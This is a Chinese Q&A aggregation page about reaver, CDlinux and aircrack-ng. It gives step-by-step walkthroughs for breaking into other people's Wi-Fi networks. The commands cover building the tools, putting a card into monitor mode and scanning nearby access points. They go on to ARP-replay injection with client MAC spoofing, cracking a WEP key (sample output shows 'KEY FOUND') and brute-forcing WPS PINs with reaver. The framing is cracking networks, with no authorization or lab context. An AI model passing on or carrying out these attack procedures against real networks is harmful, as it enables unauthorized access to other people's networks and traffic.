導航:首頁 > 操作系統 > linuxreaver

linuxreaver

發布時間:2022-07-11 04:34:17

❶ BT5怎麼安裝reaver

可按下面的步驟實施:
首先,通過官網下載reaver;
第二,通過BT5下載得到,可以先保存在桌面;
第三,進行命令執行:
cd /DeskTop
查找軟體,可通過命令ls查看reaver是否存在,存在則打開reaver文件夾
解壓文件:
tar -zxvf /DeskTop/reaver-1.4.tar.gz
進入文件:
cd /reaver-1.4/src
通過命令ls查找configure文件
執行該文件安裝:
./configure
然後通過命令執行:
make && make install
第四,檢查是否安裝成功:
輸入命令:reaver –help
第五,完成reaver安裝

❷ CDlinux reaver1.4 一鍵破解程序

已經發了,請查收郵件

發件人:大王 <[email protected]>
時 間:2012年8月4日(星期六) 中午12:10
收件人: 629860460 <[email protected]>附 件:4 個 ( 先清理.txt...)

超大附件
先清理.txt(36 Byte, 30天後過期)下載 轉存到中轉站
CDlinux.part3.rar(29.66M, 30天後過期)下載 轉存到中轉站
CDlinux.part2.rar(50.00M, 30天後過期)下載 轉存到中轉站
CDlinux.part1.rar(50.00M, 30天後過期)下載 轉存到中轉站

❸ CDlinux怎麼使用reaver-1.3

謝謝,原來是超級終端有root許可權啊,我都直接點終端的,還特意去問了切到root的命令

❹ cdlinux怎麼樣載入 reaver

進入CDlinux操作系統後,若有載入minidwep-gtk【就是我們常說的水滴】,打開,放棄WEP加密方式,右邊會有一些按鈕,你會找到一個R開頭的Reaver的按鍵,如果沒有,請將reaver.tgz放到cdlinux.iso裡面再做成u盤啟動,屆時再選擇有WPS保護加密的WIFI進行破解,若操作過程一切順利,密碼百分百可以破出

❺ 如何使用Reaver破解Wi-Fi網路的WPA密碼

方法/步驟

使用好壓、WinRAR等軟體,解壓CDLinux的鏡像文件(iso文件)。將其中的CDlinux文件夾移動到C盤。完成後的目錄如下圖所示:

安裝好EasyBCD軟體後,打開這個軟體,點擊左側的Add New Entry,再點擊右側上方的NeoGrub,然後點擊下方的Install安裝。如下圖。

點擊Configure按鈕,在跳出的記事本編輯程序中,在末尾添加如下語句,並根據電腦硬碟的展開修改第三行,win7一般為(hd0,1),xp一般為(hd0,0),具體可以在桌面或文件管理里右擊計算機->管理,然後按下圖查看:
title CDlinux in Simplified Chinese
find --set-root /CDlinux/bzImage
root (hd0,1)
kernel /CDlinux/bzImage quiet
CDL_LANG=zh_CN.UTF-8
initrd /CDlinux/initrd

關閉上一步的記事本程序,進行保存後,重啟電腦。
不出意外的話,就會在啟動項中看到NeoGrub Bootloader,用方向鍵選擇這個選項,回車就會看到CDlinux in Simplified Chinese,再次回車即可進入CDLinux系統。
進入CDLinux系統後,在桌面找到mindwep程序,雙擊打開。剛打開時會有個對話框,點OK。
點擊右側的Scan按鈕,即可掃描附近的WPA或WPA2加密的無線。等待數十秒後,會出現所有的wifi列表。

選擇其中一個名稱後面有wps標識的無線網路,點擊右側的reaver按鈕,會跳出輸入參數的對話框。建議把參數改成 -a -v -n ,默認的參數在某些情況下會有問題。點OK就開始破解啦。

接下來就是等待了,主要看信號強度和該無線的pin碼大小,可能會花2小時以上。
破解成功後會跳出如下對話框:

❻ linux可以破解wife密碼嗎

一. 軟硬體環境

硬體: cubieboard2
系統: debian (理論上基於debian的操作系統都可以, 如ubuntu, lubuntu, 等等)
無線網卡: RT3070_usb (其它無線網卡是否支持抓包以及驅動的安裝方法請自行谷歌)

由於以下所有工具的編譯都是直接在cubieboard里進行的, 所以要在cubieboard里構建編譯環境:

# apt-get install gcc make
rt3070驅動安裝:

# apt-get install firmware-ralink
二. 安裝aircrack-ng

1. 下載aircrack-ng源碼

# wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
# tar -zxvf aircrack-ng-1.1.tar.gz
2. 安裝必要的庫文件

# apt-get install libssl-dev
否則編譯時會報錯:

In file included from aircrack-ng.c:65:0:
crypto.h:12:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/home/code/wifi/aircrack-ng-1.1/src'
make: *** [all] Error 2
3. 修改編譯配置文件

# vi common.mak
搜索Werror這行, 將:
CFLAGS ?= -g -W -Wall -Werror -O3
改成:
CFLAGS ?= -g -W -Wall -O3
否則編譯時報錯:

Linux.c: In function 『is_ndiswrapper』:
linux.c:165:17: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『linux_set_rate』:
linux.c:334:22: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『linux_set_channel』:
linux.c:807:22: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『linux_set_freq』:
linux.c:896:22: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『set_monitor』:
linux.c:1022:22: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『do_linux_open』:
linux.c:1366:12: error: variable 『unused_str』 set but not used [-Werror=unused-but-set-variable]
linux.c:1352:15: error: variable 『unused』 set but not used [-Werror=unused-but-set-variable]
linux.c: In function 『get_battery_state』:
linux.c:1982:35: error: variable 『current』 set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors
make[3]: *** [linux.o] Error 1
4. 編譯,安裝

# make
# make install
三. 安裝reaver(窮舉PIN碼方式破解工具)

1. 下載reaver源碼

http://code.google.com/p/reaver-wps/downloads/list

2. 安裝必要的庫文件

# apt-get install libpcap-dev libsqlite3-dev
否則configure的時候報錯:

checking for pcap_open_live in -lpcap... no
error: pcap library not found!
3. 編譯,安裝

# cd src
# ./configure
# make
# make install
四. 安裝minidwep-gtk(圖形界面工具, 可選)

deb包, 直接下載安裝即可, 本文只專注於純命令行破解, 圖形工具安裝步驟略

五. 破解步驟

1. 安裝wireless-tools

# apt-get install wireless-tools iw
否則在使用airmon-ng命令時會報錯:

Wireless tools not found
或者
ERROR: Neither the sysfs interface links nor the iw command is available.
2. 查看自己的無線網卡的名稱,一般是wlan0或者wifi0

# ifconfig -a
3. 開啟無線網卡監控功能

# airmon-ng start wlan0
注:wlan0為你的無線設備名稱
這一步可能會看到提示有XXXX XXXX進程影響,沒關系,kill XXX XXX, XXX為給出的進程號,然後重新執行上句, 直到不報錯

4. 選擇要破解的wifi, 獲取其SSID, MAC, CHANNEL

4.1 用airomp-ng掃描

# airomp-ng mon0
會列出所有掃描到的AP列表, 如:

CH 13 ][ Elapsed: 1 min ][ 2014-05-03 23:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1D:0F:6A:0A:F6 -1 0 0 0 108 -1
00:23:CD:26:4A:B8 -59 19 20 0 6 54 . WEP WEP MERCURY
08:18:1A:89:D8:8C -63 19 0 0 1 54e WPA CCMP PSK ChinaNet-HbDm
EC:17:2F:B9:18:32 -77 11 0 0 6 54e. WPA2 CCMP PSK
08:10:76:6D:9B:74 -78 13 0 0 6 54e WPA2 CCMP PSK ZBH
F0:7D:68:55:AF:F4 -77 11 1 0 6 54e WPA2 CCMP PSK TL
AC:6E:1A:73:D7:85 -80 10 0 0 11 54e WPA2 CCMP PSK ChinaNet-43Bs
62:6E:1A:73:D7:86 -79 13 0 0 11 54e WPA2 CCMP PSK iTV-43Bs
A8:15:4D:13:0F:28 -78 19 1 0 11 54 . WPA2 CCMP PSK 2-703_TPLINK
38:83:45:7C:FE:00 -80 5 0 0 6 54e. WPA2 CCMP PSK xiaoer
20:DC:E6:F1:F1:82 -81 11 0 0 6 54e. WPA2 CCMP PSK XMing
6C:E8:73:5B:A3:2A -81 16 0 0 1 54e. WPA2 CCMP PSK HUANG
C8:3A:35:32:BA:88 -81 8 0 0 8 54e WPA CCMP PSK LYX
14:E6:E4:43:66:CA -81 2 0 0 4 54e. WPA2 CCMP PSK TP-LINK_4366CA
D8:15:0D:4D:18:18 -82 7 0 0 3 54e WPA2 CCMP PSK TP-LINK_805
8C:BE:BE:23:A5:AC -82 7 0 0 3 54e WPA2 CCMP PSK Xiaomi_las
9C:D2:4B:44:8B:68 -83 5 0 0 8 54e WPA CCMP PSK ChinaNet-bwwg
08:10:74:AB:61:7E -82 6 0 0 6 54 WPA TKIP PSK Netcore
00:1E:2A:67:EF:B0 -84 13 0 0 11 54 . WPA2 CCMP PSK SecondBegining
28:2C:B2:2C:A8:5C -84 20 0 0 11 54e. WPA2 CCMP PSK TP407
04:8D:38:00:A8:CB -21 47 181 0 7 54e WPA2 CCMP PSK

BSSID STATION PWR Rate Lost Packets Probes

00:1D:0F:6A:0A:F6 E0:B9:A5:05:D2:3D -76 0 - 1 19 6
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -1 48 - 0 0 16
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -80 0 - 2 20 8
04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -78 0e-12e 0 179
選取一個信號好的, 連接的客戶端活躍的就可以.

如果想破解WEP, 我們選取的AP信息:

SSID : MERCURY
MAC : 00:23:CD:26:4A:B8
CHANNEL : 6
ENC : WEP
如果想破解WPA/WPA2, 我們選取的AP信息:

SSID :
MAC : 04:8D:38:00:A8:CB
CHANNEL : 7
ENC : WPA2
4.2 這一步用wireless-tools或者windows下的工具WirelessMon也可以

5. 破解WEP

5.1 抓取足夠的通信數據包

# airomp-ng --ivs -w packet -c 6 wlan0
或者
# airomp-ng --ivs -w packet -c 6 --bssid 00:23:CD:26:4A:B8 wlan0 //可以加--bssid參數限定只抓特定AP的數據包
參數解釋:
--ivs 這里的設置是通過設置過濾,不再將所有無線數據保存,而只是保存可用於破解的IVS數據報文,這樣可以有效地縮減保存的數據包大小;
-c 這里我們設置目標AP的工作頻道,通過剛才的觀察,我們要進行攻擊的無線路由器channel為6;
-w 後跟要保存的文件名,所以輸入自己希望保持的文件名, 這里會生成packet-xx.ivs文件, xx是序號。後文中破解時使用ivs包可用通配符代替, 如packet-*.ivs

抓包界面如下:

CH 6 ][ Elapsed: 12 mins ][ 2014-05-04 00:23

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:8D:38:00:A8:CB -24 0 3 3 0 7 54e WPA2 CCMP PSK [email protected]
00:23:CD:26:4A:B8 -59 46 582 729 0 6 54 . WEP WEP MERCURY
EC:17:2F:B9:18:32 -75 65 458 139 1 6 54e. WPA2 CCMP PSK TARO
F0:7D:68:55:AF:F4 -78 43 461 24 0 6 54e WPA2 CCMP PSK TL
20:DC:E6:F1:F1:82 -80 33 367 0 0 6 54e. WPA2 CCMP PSK XMing
8C:21:0A:18:17:46 -78 74 513 3 0 6 54e. WPA2 CCMP PSK VincentKasim
38:83:45:7C:FE:00 -79 36 399 0 0 6 54e. WPA2 CCMP PSK xiaoer
08:10:74:AB:61:7E -82 1 261 0 0 6 54 WPA TKIP PSK Netcore
08:10:76:6D:9B:74 -82 27 277 0 0 6 54e WPA2 CCMP PSK ZBH
00:25:86:66:42:6E -83 4 19 0 0 6 54 . WEP WEP FAST_66426E
00:87:15:25:85:2C -83 90 508 18 0 6 54e WPA2 CCMP PSK RT8888
14:E6:E4:56:E2:B6 -83 0 29 0 0 6 54e. WEP WEP pig
40:16:9F:76:82:A2 -84 0 1 0 0 6 22e. WPA2 CCMP PSK WH
38:83:45:CA:42:26 -84 0 1 0 0 6 54e. WPA2 CCMP PSK tp-link n1

BSSID STATION PWR Rate Lost Packets Probes

04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -80 0 - 1e 0 152
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -76 54 - 1 0 82
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -82 54 - 1 0 763
5.2 對目標AP使用ArpRequest注入攻擊

若連接著該無線路由器/AP的無線客戶端正在進行大流量的交互,比如使用迅雷、電騾進行大文件下載等,則可以依靠單純的抓包就可以破解出WEP密碼。
但是無線黑客們覺得這樣的等待有時候過於漫長,於是就採用了一種稱之為「ARP Request」的方式來讀取ARP請求報文,並偽造報文再次重發出去,以便刺激AP產生更多的數據包,從而加快破解過程,
這種方法就稱之為ArpRequest注入攻擊。輸入命令(新開一個終端)如下:

# aireplay-ng -3 -b [AP's MAC] -h [Client's MAC] mon0
參數解釋:
-3 指採用ARPRequesr注入攻擊模式;
-b 後跟AP的MAC地址,這里就是前面我們探測到的SSID為TPLINK的AP的MAC;
-h 後跟客戶端的MAC地址,也就是我們前面探測到的有效無線客戶端的MAC;

例如

# aireplay-ng -3 -b 00:23:CD:26:4A:B8 -h D0:22:BE:EE:E8:A4 mon0
回車後將會看到如下所示的讀取無線數據報文,從中獲取ARP報文的情況出現。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airomp-ng to capture replies.
Read 3943 packets (got 0 ARP requests and 13 ACKs), sent 0 packets...(0 pps)
在等待片刻之後,一旦成功截獲到ARP請求報文,我們將會看到如下圖13所示的大量ARP報文快速交互的情況出現。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airomp-ng to capture replies.
Read 13943 packets (got 1 ARP requests and 131 ACKs), sent 12 packets...(566 pps)
Read 14045 packets (got 40 ARP requests and 231 ACKs), sent 123 packets...(566 pps)
Read 14132 packets (got 132 ARP requests and 452 ACKs), sent 234 packets...(566 pps)
Read 14212 packets (got 156 ARP requests and 645 ACKs), sent 567 packets...(566 pps)
Read 14223 packets (got 196 ARP requests and 1090 ACKs), sent 845 packets...(566 pps)
此時回到airomp-ng的界面查看,作為MERCURY的packets欄的數字在飛速遞增, 一般該值達到1萬5千以上, 就可以進行下一步的破解, 很復雜的密碼需要8萬以上的IVS。

5.3 使用aircrack-ng破解WEP

在抓取的無線數據報文達到了一定數量後,一般都是指IVs值達到1萬以上時,就可以開始破解,若不能成功就等待數據報文的繼續抓取然後多試幾次。
注意,此處不需要將進行注入攻擊的終端關閉,而是另外開一個終端進行同步破解。輸入命令如下:

# aircrack-ng 捕獲的ivs文件
例如:

# aircrack-ng packet-*.ivs
關於ivs的值數量,我們可以從如下所示的界面中看到,當前已經接受到的IVs已經達到了1萬5千以上,aircrack-ng已經嘗試了16萬個組合。

Aircrack-ng 1.1

[00:01:01] Tested 163814 keys (got 15081 IVs)

KB depth byte(vote)
0 55/ 61 AA(13248) 39(13212) BC(13212) CE(13212) 79(13208) EB(13200) 04(13128) 61(13124) 57(13088) 4F(13060) C9(13048) 75(13024) 8F(12984) A4(12984)
1 12/ 14 49(14740) 88(14628) 86(14564) D8(14520) 7C(14272) 5B(14192) 22(14160) 10(14120) 05(14040) 0E(14012) A8(13976) 87(13932) E2(13828) 5D(13796)
2 38/ 2 09(13724) ED(13608) 40(13600) 24(13572) 7E(13572) C0(13572) 50(13560) 06(13492) 97(13432) C6(13432) 23(13392) 0B(13388) B2(13316) AB(13312)
3 2/ 3 9E(16764) A8(15876) 7A(15808) 12(15800) 4B(15740) 28(15440) 53(15368) 16(15036) 69(14936) 5E(14920) 91(14892) 74(14780) 45(14772) 99(14604)
4 16/ 4 7B(14488) 4A(14384) F1(14308) 86(14228) A1(14228) 5C(14128) 17(14120) 6C(14120) 7F(14088) 02(14084) 31(14052) BF(14016) C1(14008) 0C(14004)

KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
Decrypted corretly: 100%
注意: 高強度復雜密碼破解成功依賴於更多的IVs, 如13位復雜密碼需要8萬多IVs.

❼ 如何將CDlinux 0.9.6.1 reaver共賀新春版製作成U盤啟動

用UNETBOOTIN寫入U盤之前最好格式化一下U盤,推薦採用計算機管理里的磁碟管理格式化,這樣可以清楚的看到你的U盤是否有隱藏的分區,有的話最好刪掉(本人一開始就卡在這了)寫入之後將BIOS的First啟動項設置為硬碟啟動,然後在Harddisk選項里將USB-HDD設置成第一啟動設備
PS:UNETBOOTIN會將U盤寫成USB-HDD模式

閱讀全文

與linuxreaver相關的資料

熱點內容
伺服器內網如何通過公網映射 瀏覽:476
程序員穿越到宋代 瀏覽:622
怎麼使用雲伺服器掛游戲 瀏覽:616
真實的幸福pdf 瀏覽:342
d盤php調用c盤的mysql 瀏覽:264
怎麼樣搭建源碼網站 瀏覽:427
新概念四冊pdf 瀏覽:361
怎麼下載悅虎檢測app 瀏覽:528
cad表達式命令 瀏覽:198
程序員去一個小公司值不值得 瀏覽:846
程序員做個程序多少錢 瀏覽:495
win10原始解壓軟體 瀏覽:319
阿里程序員的老家 瀏覽:258
量子加密銀行 瀏覽:193
命令方塊獲得指令手機 瀏覽:499
學習結束感言簡短程序員 瀏覽:398
android關機鬧鍾實現 瀏覽:968
滑鼠一鍵打開文件夾設置 瀏覽:161
程序員看過來我想靜靜搞笑視頻 瀏覽:370
curlphp爬蟲 瀏覽:874